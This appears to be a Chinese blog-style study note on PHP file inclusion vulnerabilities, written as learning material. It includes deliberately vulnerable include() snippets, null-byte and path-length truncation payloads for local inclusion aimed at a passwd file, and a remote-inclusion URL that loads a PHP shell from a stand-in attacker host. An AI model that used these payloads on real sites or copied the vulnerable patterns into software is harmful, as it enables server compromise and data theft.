【白帽子】文件包含漏洞

0x00 前言

看《白帽子讲web安全》的笔记，自己实际操作一下再记录一下感觉印象比较深刻

0x01 文件包含漏洞

PHP的文件包含漏洞是最常见的，在PHP中文件包含主要由4个函数完成：

include()
require()
include_once()  //只包含一次，如果该文件包含过了，就不能再包含了
require_once()

当使用这4个函数包含一个新的文件时，该文件将作为PHP代码执行，PHP内核并不会在意该被包含的文件是什么类型，所以如果被包含的是txt、图片、远程URL也将作为PHP代码执行

---

<?php
include($_GET[test]);
?>

fortest.txt 把fortest.txt当作php执行

但是当fortest.txt中加入可执行的php代码时：

在fortest.txt中加入可执行的php代码 fortest.txt中的php代码被执行

---

要想成功利用文件包含漏洞，需要满足下面两个条件：

• include()等函数通过动态变量的方式引入需要包含的文件；
• 用户能够控制该动态变量

0x02 本地文件包含

能够打开并包含本地文件的漏洞，被称为本地文件包含漏洞（Local File Inclusion,简称LFI漏洞）

---

$file=$_GET['file'];
if(file_exists('/home/test/'.$file.'.php')){
    include '/home/test/'.$file.'.php';
}
?>

当我们将$file的值赋值为../passwd时,其实被包含的文件是/home/passwd.php,但是并没有passwd.php文件（存在passwd文件），所以需要利用C语言（PHP内核是由C语言完成的）中的一些字符串的处理方法——在链接字符串时，0字节（\x00）将作为字符串结束符。所以，只要在最后加入一个0字节，就能截断file变量之后的字符串

../passwd%00              //web输入时，将\0进行URL编码

如果'\0'被替换掉了，也可以利用操作系统对目录的最大长度的限制，达到截断的目标
例如：

././././././././././././././././abc
//////////////////////////abc

0x03 远程文件包含

如果php的配置选项allow_url_include为on的话，则include/require函数是可以加载远程文件的，这种漏洞被称为远程文件包含漏洞（Remote File Include,简称RFI）

<?php
if($route=="share"){
    require_once $basePath.'/action/m_share.php';
}elseif($route=="sharelink"){
    require_once $basePath.'/action/m_sharelink.php';
}
?>

因为在$basePath前面没有任何障碍，所以构造
/?param=hettp://attacker/phpshell.txt?
最终加载的代码实际上执行了：
require_once 'hettp://attacker/phpshell.txt?/action/m_share.php'
?后面的代码被截断了，也可以用%00来截断